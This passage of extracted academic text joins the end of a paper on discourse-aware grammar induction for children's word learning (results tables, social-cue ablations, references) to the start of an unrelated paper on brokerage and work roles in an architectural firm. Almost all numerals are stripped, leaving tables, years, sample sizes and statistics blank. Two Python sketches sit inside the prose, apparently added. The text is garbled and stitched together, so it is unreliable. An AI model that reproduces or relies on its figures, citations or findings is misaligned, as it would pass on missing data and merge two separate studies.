gold dictionary provided by (johnson et al., ). to determine the best sparsity hyperparameter α for lexical rules (§ . ), we performed a line search over { , . , . , . , . }. as α decreases, performance im- proves, peaking at . , the value used for all reported results model topic word lexicon energy acc. f p r f p r f p r mcmc . . . . . . . . . . vb . . . . . . . . . . discourse . . . . . . . . . . discourse+init . . . . . . . . . . table : social-cue models. comparison of sentence- and discourse-level models (init: initialized from the vb sentence-level model) over full metrics. free energies are shown to compare vb-based models. model acc. topic f word f lexicon f mcmc . . . . em . . . . vb . . . . discourse . . . . table : baseline (non-social) models. comparison of sentence-level models (mcmc (johnson et al., ), em, vb) and the discourse-level model. results in table suggest that incorporating topic continuity through the discourse model boosts performance compared to sentence-level models. within sentence-level models, em is inferior to both mcmc and vb (in accordance with the consensus that em is likely to overfit for pcfgs). 
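one way such hyperparameters could be laid out is sketched below (the rule inventory and the candidate α values are placeholders; the paper's actual search values are not reproduced here):

```python
# placeholder rule inventory; only lexical rules Word_t -> w for topical t receive
# the sparse symmetric prior, while Word_none and all structural rules get 1.0
grammar_rules = [("Word_pig", "piggie"), ("Word_pig", "the"),
                 ("Word_none", "the"), ("Sentence", "Topic_pig Words_pig")]

def hyperparameter(rule, alpha):
    lhs = rule[0]
    if lhs.startswith("Word_") and lhs != "Word_none":
        return alpha            # sparse prior biases Word_t toward few words
    return 1.0                  # uniform prior elsewhere

for alpha in (0.5, 0.1, 0.01):  # illustrative candidates for the line search
    priors = {rule: hyperparameter(rule, alpha) for rule in grammar_rules}
    # ... run vb to convergence with these priors and keep the best alpha ...
    print(alpha, priors)
```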
comparing vb and mcmc, vb is significantly better at topic accuracy but is worse at topic f . this result sug- gests that vb predicts that more utterances are non- topical compared with mcmc, perhaps explaining why mcmc has the highest word f . nevertheless, unlike vb, the discourse model outperforms mcmc in all topic metrics, indicating that topic continuity helps in predicting both null and topical utterances. the discourse model is also capable of captur- ing topical transitions. examining one instance of a learned grammar reveals that the distribution un- der discourset is often dominated by a few major transitions. for example, car tends to have transi- tions into car ( . ) and truck ( . ); while pig prefers to transit into pig ( . ) and dog ( . ). these learned transitions nicely recover the struc- ture of the task that caregivers were given: to play with toy pairs like car/truck and pig/dog. . social-cue models we next explore how topic continuity interacts with social information via a set of simulations mirroring those in the previous section. results are shown in table . for the sentence-level models using social cues, vb now outperforms mcmc in topic accuracy and f , as well as lexicon evaluations, suggesting that vb is overall quite competitive with mcmc. turning to the discourse models, social informa- tion and topic continuity both independently boost learning performance (as evidenced in johnson et al. ( ) and in section . ). nevertheless, joint infer- ence using both information sources (discourse row) resulted in a performance decrement. rather than reflecting issues in the model itself, perhaps the in- creased complexity of the inference problem might have led to this performance decrement. to test this explanation, we initialized our discourse-level model with the vb sentence-level model. results are shown in the discourse+init row. with a sentence-level initialization, perfor- mance improved substantially, yielding the best re- sults over most metrics. in addition, the discourse model with sentence-level initialization achieved lower free energy than the standard initialization dis- course model. both of these results support the hy- pothesis that initialization facilitated inference in the more complex discourse model. from a cognitive science perspective, this sort of result may point to the utility of beginning the task of discourse segmen- tation with some initial sentence-level expectations. . effects of individual social cues the importance of particular social cues and their relationship to discourse continuity is an additional topic of interest from the cognitive science per- spective (frank et al., ). returning to one of the questions that motivated this work, we can use detailed breakdown of word f-scores reveals that mcmc is much better at precision, indicating that vb predicts more words as topical than mcmc. an explanation for such effect is that we use the same α for all lexical rules, which results in suboptimal sparsity levels for wordt distributions. for mcmc, johnson et al. ( ) used the adaptor grammar software to learn the hyperparameters automatically from data. all no.child.eyes no.child.hands no.mom.eyes no.mom.hands no.mom.point mcmc . / . / . / . . / . / . / . . / . / . / . . / . / . / . . / . / . / . . / . / . / . vb . / . / . / . . / . / . / . . / . / . / . . / . / . / . . / . / . / . . / . / . / . discourse+init . / . / . / . . / . / . / . ∗+ . / . / . / . + . / . / . / . . / . / . / . . / . / . / . table : social cue influence. 
ablation test results across models without discourse (mcmc, vb) and with discourse (discourse+init). we start with the full set of social cues and drop one at a time. each cell contains results for metrics: topic accuracy/topic f /word f /lexicon f . for row discourse+init, we compare models with/without a social cue using chi-square tests and denote statistically significant results (p < . ) at the utterance (∗) and word (+) levels. none child.eyes child.hands mom.eyes mom.hands mom.point mcmc . / . / . / . . / . / . / . . / . / . / . . / . / . / . . / . / . / . . / . / . / . vb . / . / . / . . / . / . / . . / . / . / . . / . / . / . . / . / . / . . / . / . / . discourse . / . / . / . . / . / . / . ∗+ . / . / . / . ∗+ . / . / . / . ∗+ . / . / . / . + . / . / . / . ∗+ table : social cue influence. add-one test results across models without discourse (mcmc, vb) and with discourse (discourse). we start with no social information and add one cue at a time. each cell contains results for metrics: topic accuracy/topic f /word f /lexicon f . for row discourse, we compare models with/without a social cue using chi-square tests and denote statistically significant results (p < . ) at the utterance (∗) and word (+) levels. our discourse model to answer the question about the role that the child.eyes cue plays in child- directed discourses. johnson et al. ( ) raised two hypotheses that could explain the importance of child.eyes as a social cue: ( ) caregivers “fol- low in” on the child’s gaze: they tend to talk about what the child is looking at (baldwin, ), or ( ) the child.eyes cue encodes the topic of the pre- vious sentence, inadvertently giving a non-discourse model access to rudimentary discourse information. to address this question, we conduct two tests: ( ) ablation – eliminating each social cue in turn (e.g. child.eyes), and ( ) add-one, using a sin- gle social cue per turn. table and show corre- sponding results for models without discourse (the mcmc and vb sentence-level models) and with discourse (discourse+init for the ablation test and discourse for the add-one test). we observe simi- lar trends to johnson et al. ( ): the childs gaze is the most important cue. removing it from the full model with all social cues or adding it to the base model with no cues both result in the largest perfor- mance change; in both cases this change is statisti- cally reliable. the large performance differences for child.eyes are consistent with the hypothe- sis that caregivers are following in, or discussing the object that children are interested in – even control- it is somewhat surprising when child.eye has much less influence on vb than on mcmc in the ablation test. though re- sults in the add-one test reveal that vb generalizes much better than mcmc when presented with a single social cue, it remains interesting to find out internally what causes the difference. ling for the continuity of discourse, a confound in previous analyses. in other words, the importance of child.eyes in the discourse model suggests that this cue encodes useful information in addition to the intersentential discourse topic. . discourse structure evaluation while the discourse model performs well using met- rics from previous work, these metrics do not fully reflect an important strength of the model: its abil- ity to capture inter-utterance structure. for exam- raw discourse utterance car car come here lets find the car car there car car is that a car car car the car goes vroom vroom vroom table : topic annotation examples. 
raw (previous metrics) and discourse (new metrics). ple, consider the sequence of utterances in table . our previous evaluation is based on the raw annota- tion, which labels as topical only utterances contain- ing topical words or pronouns referring to an object. as a result, classifying “there” as car is incorrect. from the perspective of a human listener, however, “there” is part of a broader discourse about the car, and labeling it with the same topic captures the fact that it encodes useful information for learners. to differentiate these cases, frank and rohde (under re- view) added a new set of annotations (to the dataset used in section ) based on the discourse structure perceived by human, similar to column discourse, . we utilize these new annotations to judge topics predicted by our discourse model and adopt previ- ous metrics for discourse segmentation evaluation: a=b, a simple proportion equivalence of discourse assignments; pk, a window method (beeferman et al., ) to measure the probability of two random utterances correctly classified as being in the same discourse; and windowdiff (pevzner and hearst, ), an improved version of pk which gives “par- tial credit” to boundaries close to the correct ones. results in table demonstrate that our model is in better agreement with human annotation (model- human) than the raw annotation (raw-human) across all metrics. as is visible from the limited change in the a=b metric, relatively few topic assignments are altered; yet these alterations create much more coherent discourses that allow for far better segmen- tation performance under pk and windowdiff. raw-human model-human a=b . . pk . . windowdiff . . table : discourse evaluation. single annotator sample, comparison between topics assigned by the raw annota- tion, our discourse model, and a human coder. to put an upper bound on possible discourse seg- mentation results, we further evaluated performance on a subset of utterances for which multiple an- notations were collected. results in table demon- strate that our model predicts discourse topics (m-h , m-h ) at a level quite close to the level of agreement between human annotators (column h -h ). r-h r-h m-h m-h h -h a=b . . . . . pk . . . . . windowdiff . . . . . table : discourse evaluation. multiple annotator sam- ple, comparison between raw annotations (r), our model (m), and two independent human coders (h , h ). conclusion and future work in this paper, we proposed a novel integration of existing techniques in parsing and grammar induc- tion to offer a complete solution for simultaneously modeling grounded language at the sentence and discourse levels. specifically, we used the ear- ley algorithm to exploit the special structure of our grammars to achieve approximately linear parsing time, introduced a rescaling approach to handle very long input strings, and utilized variational bayes for grammar induction to obtain better solutions than the expectation maximization algorithm. by transforming a grounded language learning problem into a grammatical inference task, we used our parser to study how discourse structure could facilitate children’s language acquisition. in ad- dition, we investigate the interaction between dis- course structure and social cues, both important and complementary sources of information in lan- guage learning (baldwin, ; frank et al., ). we also examined why individual children’s gaze was an important predictor of reference in previ- ous work (johnson et al., ). 
using ablation tests, we showed that information provided by the child’s gaze is still valuable even in the presence of discourse continuity, supporting the hypothesis that parents “follow in” on the particular focus of chil- dren’s attention (tomasello and farrar, ). lastly, we showed that our models can produce accurate discourse segmentations. our system’s out- put is considerably better than the raw topic anno- tations provided in the previous social cue corpus (frank et al., ) and is in good agreement with discourse topics assigned by human annotators in frank and rohde (under review). in conclusion, although previous work on grounded language learning has treated individual utterances as independent entities, we have shown that the ability to incorporate discourse information can be quite useful for such problems. discourse continuity is an important source of information in children language acquisition and may be a valuable part of future grounded language learning systems. acknowledgements we thank the tacl action editor, mark steed- man, and the anonymous reviewers for their valu- able feedback, as well as chris manning for helpful discussions. this research was supported under the australian research council’s discovery projects funding scheme (project numbers dp and dp ). references alfred v. aho and jeffery d. ullman. . the the- ory of parsing, translation and compiling; volume : parsing. prentice-hall, englewood cliffs, new jersey. yoav artzi and luke s. zettlemoyer. . weakly su- pervised learning of semantic parsers for mapping in- structions to actions. transactions of the association for computational linguistics, : – . john aycock and r. nigel horspool. . practical ear- ley parsing. the computer journal, ( ): – . lalit r. bahl, frederick jelinek, and robert l. mercer. . a maximum likelihood approach to continu- ous speech recognition. ieee transactions on pattern analysis and machine intelligence, ( ): – . james k. baker. . trainable grammars for speech recognition. the journal of the acoustical society of america, (s ):s . jason baldridge and alex lascarides. . proba- bilistic head-driven parsing for discourse structure. in conll. dare a. baldwin. . infants’ ability to consult the speaker for clues to word reference. journal of child language, : – . regina barzilay and mirella lapata. . collective content selection for concept-to-text generation. in hlt-emnlp. doug beeferman, adam berger, and john lafferty. . statistical models for text segmentation. ma- chine learning, ( - ): – . benjamin börschinger, bevan k. jones, and mark john- son. . reducing grounded learning tasks to gram- matical inference. in emnlp. s. r. k. branavan, harr chen, luke s. zettlemoyer, and regina barzilay. . reinforcement learning for mapping instructions to actions. in acl-ijcnlp. malinda carpenter, katherine nagell, michael tomasello, george butterworth, and chris moore. . social cognition, joint attention, and com- municative competence from to months of age. monographs of the society for research in child development, ( ). david l. chen and raymond j. mooney. . learning to sportscast: a test of grounded language acquisition. in icml. david l. chen, joohyun kim, and raymond j. mooney. . training a multilingual sportscaster: using per- ceptual context to learn language. journal of artificial intelligence research, : – . james clarke, dan goldwasser, ming-wei chang, and dan roth. . driving semantic parsing from the world’s response. in conll. jay earley. . 
an efficient context-free parsing algo- rithm. communications of the acm, ( ): – . vanessa wei feng and graeme hirst. . text-level discourse parsing with rich linguistic features. in acl. katherine forbes, eleni miltsakaki, rashmi prasad, anoop sarkar, joshi aravind, and bonnie webber. . d-ltag system: discourse parsing with a lexical- ized tree adjoining grammar. journal of logic, lan- guage and information, : – . michael c. frank and hannah rohde. under review. markers of topical discourse in child-directed speech. michael c. frank, noah d. goodman, and josh b. tenen- baum. . a bayesian framework for cross- situational word-learning. advances in neural infor- mation processing systems . michael c. frank, joshua b. tenenbaum, and anne fernald. . social and discourse contributions to the determination of reference in cross-situational word learning. language learning and development, ( ): – . jianfeng gao and mark johnson. . a comparison of bayesian estimators for unsupervised hidden markov model pos taggers. in emnlp. dan goldwasser and dan roth. . learning from natural instructions. in ijcai. dan goldwasser, roi reichart, james clarke, and dan roth. . confidence driven unsupervised semantic parsing. in acl. peter gorniak and deb roy. . situated language understanding as filtering perceived affordances. cog- nitive science, ( ): – . hugo hernault, helmut prendinger, david a. duverle, and mitsuru ishizuk. . hilda: a discourse parser using support vector machine classification. di- alogue and discourse, ( ): – . jerry r. hobbs. . literature and cognition. csli lecture notes . liang huang and kenji sagae. . dynamic program- ming for linear-time incremental parsing. in acl. frederick jelinek and john d. lafferty. . compu- tation of the probability of initial substring generation by stochastic context-free grammars. computational linguistics, ( ): – . mark johnson, katherine demuth, and michael frank. . exploiting social information in grounded lan- guage learning via grammatical reduction. in acl. mark johnson. . pcfgs, topic models, adaptor gram- mars and learning topical collocations and the struc- ture of proper names. in acl. joohyun kim and raymond j. mooney. . unsu- pervised pcfg induction for grounded language learn- ing with highly ambiguous supervision. in emnlp- conll. joohyun kim and raymond j. mooney. . adapting discriminative reranking to grounded language learn- ing. in acl. alistair knott and ted sanders. . the classification of coherence relations and their linguistic markers: an exploration of two languages. journal of pragmatics, ( ): – . kenichi kurihara and taisuke sato. . an appli- cation of the variational bayesian approach to proba- bilistic contextfree grammars. in ijcnlp workshop beyond shallow analyses. kenichi kurihara and taisuke sato. . variational bayesian grammar induction for natural language. in icgi. tom kwiatkowski, luke s. zettlemoyer, sharon gold- water, and mark steedman. . inducing proba- bilistic ccg grammars from logical form with higher- order unification. in emnlp. alex lascarides and nicholas asher. . temporal interpretation, discourse relations, and common sense entailment. linguistics and philosophy, ( ): – . joop m. i. m. leo. . a general context-free parsing algorithm running in linear time on every lr(k) gram- mar without using lookahead. theoretical computer science, ( ): – . roger levy. . expectation-based syntactic compre- hension. cognition, ( ): – . percy liang, michael i. jordan, and dan klein. . 
learning semantic correspondences with less supervi- sion. in acl-ijcnlp, pages – . percy liang, michael i. jordan, and dan klein. . learning dependency-based compositional semantics. in association for computational linguistics (acl). ziheng lin, hwee tou ng, and min-yen kan. . a pdtb-styled end-to-end discourse parser. natural lan- guage engineering, firstview: – . wei lu, hwee tou ng, wee sun lee, and luke s. zettle- moyer. . a generative model for parsing natural language to meaning representations. in emnlp. william c. mann and sandra a. thompson. . rhetorical structure theory: toward a functional the- ory of text organization. text, ( ): – . daniel marcu. . the rhetorical parsing of natural language texts. in acl. daniel marcu. . a decision-based approach to rhetorical parsing. in acl. lev pevzner and marti a. hearst. . a critique and improvement of an evaluation metric for text segmen- tation. computational linguistics, ( ): – . livia polanyi, chris culy, martin van den berg, gian lorenzo thione, and david ahn. . a rule based approach to discourse parsing. in sigdial. hoifung poon and pedro domingos. . unsuper- vised semantic parsing. in emnlp. lawrence r. rabiner. . a tutorial on hidden markov models and selected applications in speech recognition. remko scha and livia polanyi. . an augmented context free grammar for discourse. in coling. jeffrey m. siskind. . a computational study of cross-situational techniques for learning word-to- meaning mappings. cognition, ( - ): – . benjamin snyder and regina barzilay. . database- text alignment via structured multilabel classification. in ijcai. radu soricut and daniel marcu. . sentence level discourse parsing using syntactic and lexical informa- tion. in naacl. andreas stolcke. . an efficient probabilistic context-free parsing algorithm that computes prefix probabilities. computational linguistics, ( ): – . rajen subba and barbara di eugenio. . an effec- tive discourse parser that uses rich linguistic informa- tion. in naacl. stefanie tellex, thomas kolla, steven dickerson, matthew r. walter, ashis g. banerjee, seth teller, and nicholas. roy. a. approaching the symbol grounding problem with probabilistic graphical mod- els. ai magazine, ( ): – . stefanie tellex, thomas kolla, steven dickerson, matthew r. walter, ashis g. banerjee, seth teller, and nicholas roy. b. understanding natural lan- guage commands for robotic navigation and mobile manipulation. in aaai. michael tomasello and michael jeffrey farrar. . joint attention and early language. child development, pages – . adam vogel and daniel jurafsky. . learning to fol- low navigational directions. in acl. yuk wah wong and raymond j. mooney. . learn- ing synchronous grammars for semantic parsing with lambda calculus. in acl. chen yu and dana h. ballard. . on the integration of grounding language and learning objects. in aaai. chen yu and dana h ballard. . a unified model of early word learning: integrating statistical and social cues. neurocomputing, ( ): – . luke s. zettlemoyer and michael collins. . learn- ing to map sentences to logical form: structured classification with probabilistic categorial grammars. in uai. michael zettlemoyer, luke s.and collins. . online learning of relaxed ccg grammars for parsing to log- ical form. in emnlp-conll. © authors. this work is licensed under the creative commons attribution . license (https://creativecommons.org/licenses/by/ . /). connections issue | vol. article | doi: . /connections- . 
the contingent effect of work roles on brokerage in professional organizations anssi smedlund ,* and emily w. choi finnish institute of occupational health, helsinki, uusimaa. naveen jindal school of management, the university of texas at dallas, texas, tx. *e-mail: anssi.smedlund@ttl.fi abstract in this paper, we consider whether brokerage in an intra-organizational communication network and the type of work role interact to predict individual performance in a professional organization. the independent–interdependent nature of work roles is considered a key factor in structural contingency theory, but it has yet to be studied in relation to brokerage. we propose that a brokerage position has a joint effect on performance along with the work role, based on a study of an organization-wide communication network in an architectural firm with employees. our analysis suggests an association between brokerage and role-prescribed performance for individuals in both interdependent and independent types of work roles. our findings also suggest that for interdependent roles, which require broad, organization-wide collaboration and communication with others, brokerage is positively associated with the performance prescribed by the role, but for independent roles, wherein collaboration and communication are somewhat limited by the formal role, brokerage has far less of an effect. our findings contribute to brokerage theory by comparing how brokerage affects performance in two distinct work roles and by illustrating how the benefits of brokerage seem more restricted to those in interdependent work roles. the contribution of this paper is to suggest the independent–interdependent nature of the work role as a boundary condition for brokerage. keywords network theory, brokerage, formal organization, informal organization, work role, interdependency brokerage theory is probably one of the most influential lines of thought in network theory. since burt's ( ) seminal book, brokerage has been studied and associated with numerous organizational advantages for an individual, such as higher salary and faster promotion, based on the benefits of having better access to information and greater control over other actors than their more socially constrained colleagues (burt, ). while brokerage generally provides benefits, some studies have found that under context-specific conditions, there may not always be positive effects (e.g. barnes et al., ; burt, ; fleming et al., ). therefore, as the empirical results are mixed, the contingencies and boundary conditions for brokerage merit further research. an important, but generally overlooked, boundary condition in structural network analysis is the independent–interdependent nature of work roles, even though interdependency has been widely used as a moderator in general management studies and is at the core of structural contingency theory (thompson, ). interdependence regulates how much individuals can communicate and collaborate with others to perform their work effectively (cummings, ; wang et al., ), and it is one of the most important factors influencing team performance in organizations (langfred, ; saavedra et al., ). in structural contingency theory, numerous dimensions of interdependence, such as pooled, sequential, or reciprocal types, have been distinguished based on the exchange of information or resources (thompson, ).
this empirical study considered how the benefits of brokerage are contingent on the independent–interdependent nature of the work role; that is, how the informal organization, operationalized as the intra-organizational communication network structure, corresponds with the formal work role for performance. the novelty and value of this approach is that although the formal and the informal organization have each been linked to performance outcomes, their effects on each other have seldom been linked in the literature (mcevily et al., ). following the logic of structural contingency theory to test the formal work role's effect as a boundary condition for brokerage, our paper explores whether work role moderates the effect of brokerage on performance in professional organizations. drawing from the nature of work at our case architectural firm, our hypothesis is developed from the starting point that work in a professional organization is generally anchored on either independent or interdependent tasks and that work roles are formed accordingly. both independent and interdependent roles prompt role-prescribed performance expectations due to the division of labor: professionals typically work on intellectually demanding projects, requiring them to focus their energy on the highly demanding operative work, which simultaneously creates demand for interdependent roles to manage the projects and the supporting organizations (cf. etzioni, ; weber, ). thus, the formal work role not only limits interdependence for the professionals, but also requires managers to adopt the interdependent role and to communicate and collaborate broadly across the organization. in this paper, we hypothesize that individuals perform best when brokerage and role-prescribed performance are aligned. our data are derived from a communication network study of an architectural firm of employees, of which were classified as working mainly in either independent (n = ) or interdependent (n = ) roles. we chose to study this specific architectural firm as a typical professional organization because the firm had clearly distinguished work roles for the independent professional architects and the interdependent managers. in our analysis, we examined the moderating effect of work role in the association between brokerage and role-specific individual performance. role-specific performance involved an objective measure of either billable hours for the professional architects (i.e. independent work role) or a peer evaluation score of managers as promoters of ideas (i.e. interdependent work role). our study contributes to the underlying assumptions about the effects of brokerage. despite a few negative reports in the literature (e.g. barnes et al., ; fleming et al., ), the general understanding about brokerage is that it benefits the individual in most circumstances. in this regard, our study contributes to brokerage theory by pointing out work role as an important contingency. in practical terms, our findings imply that independent professionals, such as architects, do not seem to benefit so much from networking and bridge building, since these are less related to their role-prescribed performance. in the context of management theory, our study contributes to a better understanding of the interplay of formal and informal organizations. these two topics have historically remained separate and unconnected (mcevily et al., ) but have spurred a number of integrative studies (biancani et al., ; kleinbaum et al., ; soda and zaheer, ; srivastava, ).
by treating work role as a moderator shaping the association between brokerage and performance, we address this gap in the literature by extending structural network analysis with contingencies (adler and kwon, ; carnabuci and oszegi, ; cross and cummings, ; hansen, ; mehra et al., ). by doing this, we increase the explanatory power of structural analysis (lincoln, ; cf. lincoln and miller, ), resulting in increased knowledge of how informal network position is associated with role-prescribed performance. contingent effect of work role on the relationship between brokerage and performance the basic tenet of our study is that there are, on the whole, fundamental differences in the communication and cooperation requirements between independent and interdependent work roles. according to classical management theory, work roles outline a kind of bureaucratic boundary for the social relationships that individuals can and should adhere to and engage in within their organization: when an individual is assigned a certain role, the communication network becomes somewhat inherited and defined by the role (hansen and haas, ; lincoln and miller, ; mcevily et al., ; merton, ; weber, ). (the case organization's work role structures and innovation activities were studied extensively in a two-year research project with theme-based interviews and several workshops; the results are reported in a phd thesis, see tuominen ( ).) over time, individuals develop informal networks largely corresponding to the role-prescribed relationships (lincoln and miller, ; padgett and ansell, ), but the networks reach beyond the formal bureaucratic boundaries as individuals communicate freely across the organization (krackhardt, ). in addition to communication, the formal division of labor and the corresponding roles also affect expected performance. previous research has noted that a work role defines what types of activities an individual performs, prompts normative expectations in an organization, and sets the standard for how performance is evaluated (biddle, ; katz and kahn, ; welbourne et al., ). in the most extreme cases, performance that is not prescribed by the work role is prohibited and only the type of performance established for the role is rewarded (pfeffer and salancik, ). conceivably because performance expectations are strongly determined by the work role, a notable body of research specifically considers work role performance and the conditions to manage and maximize it (griffin et al., ; leroy et al., ). the contingent effect of work roles on the relationship between brokerage and performance can be analyzed using structural contingency theory combined with the conception of the organization as a socio-technical system. as a socio-technical system, a professional organization is a combination of social, interpersonal communication networks and technical roles specified by the formal division of labor, wherein the formal aspects interact with the social aspects of performance (cummings, ). from this perspective, the work role is derived from technology and corresponds with thompson's ( ) pooled task interdependence for independent work and reciprocal task interdependence for interdependent work. in the former category, rules and standard procedures provide enough coordination for individuals and teams to work independently toward a common goal, and in the latter category, the coordination mechanism involves mutual adjustment, as the work is performed together to produce the output.
specifically, the independent–interdependent nature of work has been a key focus of research related to team performance (cummings, ; langfred, ; wang et al., ). in these studies, interdependence is built into the work the team performs and is then treated as a moderator of aspects such as group autonomy, collective efficacy, group potency, organizational citizenship, or diversity for several different types of outcomes (bachrach et al., ; langfred, , ; stajkovic et al., ; wang et al., ). notable in the results of these studies is the support for the mechanisms derived from thompson's ( ) theory, which demonstrate that the need for communication and cooperation increases along with task interdependency, the complexity of goals, and feedback (saavedra et al., ). in professional organizations, these dimensions become increasingly complex at higher positions in the formal hierarchy, simply because managers tend to have increasingly broader job descriptions than their subordinates and participate in a larger number of overlapping projects of various kinds. typically, managers are experienced professionals in their field, and they perform some of the client project work in addition to fulfilling expectations toward sales, organizational development, and coordinating activities in their departments or other work units (e.g. etzioni, ). a manager's goals are in this respect defined from both above and below their hierarchical position, and they receive feedback for their work from several others aside from their immediate colleagues. in contrast, professionals are technical specialists, and performing their job well generally requires spending more time at their desks working on specific projects; they thus have inherently higher independence incorporated into their work roles, even if their project may require combining several individuals' work. table summarizes how professionals and managers differ in terms of interdependency based on the dimensions identified by saavedra et al. ( ). a brokerage position in a communication network of interdependent work roles can provide a major boost to effective communication and cooperation. studies show that brokerage provides the best position to coordinate work across other areas of a work communication network (burt, ; granovetter, ) and increases the ability to convey ideas across the organization to distant individuals in the network (reagans and mcevily, ). brokerage also increases the chances that an individual's activities will be considered and engaged with by others and, concomitantly, judged valuable (burt, ). in general, brokerage means less structural constraint, more diversity, and weaker ties (aral and van alstyne, ), and it allows individuals to benefit from non-redundant sources of knowledge (hansen, ). the more interdependent the work role is, the greater the need for brokerage in a professional organization. our hypothesis evaluates how brokerage in the communication network and the independent–interdependent work roles interact with each other: h . work role moderates the relationship between brokerage and role-prescribed performance such that the contribution of brokerage is stronger when the work role is interdependent compared to independent. methods data we tested our hypotheses using data collected in an architectural firm during a two-year study.
we collected questionnaire and timesheet data from employees who participated in client projects, resided in the same open office, and were employed during the first and second years of the study (n = ). to control for common method variance and to develop a causal argument about network positions and performance, the data on the dependent variables were collected in the second year of the study from time sheets and from an additional online survey. in total, there were employees at the start of the study; the remaining employees worked at other physical locations, had left the company, or belonged to the administrative staff (e.g. information system administration and payroll). there were five formal roles: professionals, project managers, senior project managers, and managing partners. the professional architects were coded as independent roles (n = ) and all manager roles were coded as interdependent roles (n = ). the professionals performed different aspects of design and drawings, and the managers attended to sales, project management, and development. based on interviews about work roles and innovative activities at the case company reported by tuominen ( ), the professionals were clearly a distinct group from the managers and were allowed to focus mainly on their solitary architectural design work. conversely, managers were given broad responsibilities in managing work units and engaged in development and innovation. the case firm invested heavily in innovation and development and, just before the beginning of our data collection, promoted several individuals previously working as professional architects to project managers. both work roles required talent and extensive training in architectural design, but they differed in communication patterns: the managers had to communicate across the firm to participate in and supervise several development projects. a total of % of the sample were women, and % had a master's degree in architecture, which is the minimal required training for certified architects. the remaining % had a bachelor's degree or a vocational degree in a related design field. the average tenure was . years (sd = . ) for managers and . years (sd = . ) for professionals.
table . differences between independent and interdependent work roles in a professional organization.
typical formal role. independent roles: professional. interdependent roles: manager.
task interdependency. independent roles: client projects of several sequential and parallel tasks to be worked on alone and coordinated within the project team. interdependent roles: supervision over work units, selling, negotiating, and participating in several client projects; member of business development and strategy development teams.
goal interdependency. independent roles: the client project provides clear goals for each individual and for the compiled output of the project. interdependent roles: several goals coming from projects, the firm, and clients.
feedback interdependency. independent roles: individuals receive feedback from colleagues working on the same project; collective feedback is provided by the superior and the client during and after the project. interdependent roles: feedback from the subordinates, from clients, and from top management; feedback from several projects.
requirements for collaboration and coordination. independent roles: lower. interdependent roles: higher.
measures dependent variables we used billable hours from clients as a dependent variable of role-prescribed performance for the independent work roles. this was constructed based on time sheets, where the employees had allocated their working time to a variety of categories.
we chose billable hours from the client category as a performance measure of independent work roles, because the firm aimed at maximizing it, and it was directly linked to annual profit. we calculated a monthly mean of the number of billable hours to generate a uniform variable to describe individuals’ average performance through the year. monthly mean billable hours for interdependent roles were . (sd = . ) and for independent roles . (sd = . ). the variable was normalized with second power transformation to adjust its skew. for the variable describing role-prescribed performance for interdependent work roles, we chose promoting of new ideas. following the survey examples from wasserman and faust ( ), the variable was constructed from a questionnaire in which the respondent was asked to name five individuals in the firm who promote new ideas. each nomination received one point, and points were summed resulting in a count variable of interdependent work roles’ performance. this procedure was chosen, because it provides a single component measure of a person’s perceived competence and ability to put forth actions in the organization that will eventually lead to innovation (march, ). this measure also corresponds with the current understanding of creativity that highlights the generation of both novel and useful ideas (amabile, ) and provides a measure to identify those individuals who are both coming up with ideas and promoting them. the variable was normalized with square root transformation to adjust its skew. independent variables the network data consisted of information on self-reported social ties in three types of work- related communication collected through an online sociometric survey instrument in the first year of study. preliminary interviews consistently identified three types of informal, work-related interaction among employees that we distinguished in our survey: communication about the (i) day-to-day architectural design work, (ii) innovative new ideas, and (iii) business development. the network data were obtained from a free-choice survey with two-way directed questions, wherein giving-information-to and getting-information- from components of communication were asked separately (wasserman and faust, ). thus, three network survey question pairs were used: one for communication about the day-to-day architectural design work, one for innovative new ideas, and one for business development. the wording of the questions were tailored to reflect the conditions of the company based on the interviews, and were checked with one of the supervisors before publishing the survey online. a one-sentence example was given in all three types of communication. communication about the day-to- day architectural design work was defined as relating to the output delivered to clients that was recurring and was in the realm of respondent’s line of expertise. communication for innovative new ideas was defined as work-related ideas that the respondent was not aware of anyone else proposing previously. business development communication was defined as com- munication about improvements in pre-existing products or services, or internal company process or personal work practices. the response rate was % for the questions about communication in day-to-day architectural design work and business development tasks and % in communicating innovative new ideas. 
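to make the construction of the two role-prescribed performance measures described above concrete, the following is a minimal pandas sketch; the frame layouts and column names (timesheets, nominations, employee_id, and so on) are hypothetical, and only the monthly-mean, second-power, and square-root steps follow the description in the text.

```python
import pandas as pd
import numpy as np

# hypothetical input frames; column names are illustrative, not from the paper.
# timesheets: one row per employee per month with hours billed to clients.
timesheets = pd.DataFrame({
    "employee_id": [1, 1, 2, 2],
    "month": ["y1-01", "y1-02", "y1-01", "y1-02"],
    "billable_hours": [120.0, 98.5, 60.0, 75.5],
})
# nominations: one row per "promotes new ideas" nomination received.
nominations = pd.DataFrame({"nominee_id": [1, 1, 3]})

# dv for independent roles: monthly mean of billable hours over the year,
# then a second-power transformation to adjust the skew.
mean_billable = timesheets.groupby("employee_id")["billable_hours"].mean()
billable_dv = mean_billable.pow(2).rename("billable_hours_dv")

# dv for interdependent roles: count of idea-promoter nominations,
# then a square-root transformation to adjust the skew.
idea_counts = nominations["nominee_id"].value_counts()
idea_dv = np.sqrt(idea_counts).rename("idea_promotion_dv")

print(billable_dv)
print(idea_dv)
```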
in the online survey, the network questions were presented after a filtering question wherein the employees had defined their own acquaintances from a roster of all employee names. the small organization size permitted a full roster method, which rules out recall bias, thus increasing the reliability of the network measures (marsden, ). separating the giving-and-getting components of communication further increases psychometric reliability by allowing confirmation of each social tie (krackhardt, ). the frequency scale for communication was set to choices of ( ) daily, ( ) weekly, ( ) once a month, ( ) less than once a month, or ( ) not at all. we transposed the getting-information-from component in each of the network question pairs and joined the resulting two networks together by using the value of the giving-information component as the communication frequency, resulting in confirmed communication ties between individuals. before generating the brokerage measures, we combined the three networks by summing up the frequencies and then dichotomizing at the mean frequency (min = , max = , mean = . , sd = . ). brokerage our first brokerage measure was the additive inverse of burt's constraint (burt, ). first, we generated burt's constraint with the ucinet vi structural holes routine, limiting the measure to consider only an individual's contacts' ties and using both outgoing and incoming ties. then we generated our brokerage measure as the additive inverse of the constraint score, following recent network studies (carnabuci and oszegi, ; soda et al., ). thus, the higher the resulting brokerage measure, the more brokering opportunities the individual has. in other words, our measure indicates how an individual's communication is concentrated in non-redundant contacts in groups of connected colleagues, because less constrained actors are connected to more groups of others (burt, ). in our analysis, the higher the additive inverse of burt's constraint, the better the opportunities for brokerage the individual has. as the second brokerage measure, we used betweenness centrality (freeman, ), generated with the stata package "nwcommands". we added betweenness centrality to the measures because it has been frequently used as an additional brokerage measure (e.g. fang et al., ). independent work role we created a dummy variable to distinguish between independent and interdependent roles. all individuals in any of the 